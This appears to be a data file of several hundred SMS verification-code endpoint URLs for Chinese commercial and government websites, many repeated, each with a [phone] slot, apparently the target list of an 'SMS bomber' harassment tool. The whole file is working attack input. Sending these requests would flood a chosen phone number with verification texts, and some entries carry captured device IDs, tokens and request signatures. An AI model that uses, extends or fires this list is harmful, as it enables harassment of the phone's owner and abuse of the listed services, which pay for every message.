"https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", - "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "http://passport.lotour.com/reg/sendPhoneCode?callback=&_=&mobile=[phone]", - "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584495050906", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", - "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", - "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", - "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", - "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=+86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", - "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=希沃学院SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://open.leju.com/game/member/sendcode.html?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", - "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.id68.cn/member/common/ckuser/ m=mobile&a=isMobile&format=ajax&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584431770018", - "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.metromall.cn/user/MobileCode.aspx?randnum=&Phone=[phone]", - "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", - "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", - "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.baixing.com/oz/verify/reg?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", - "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - 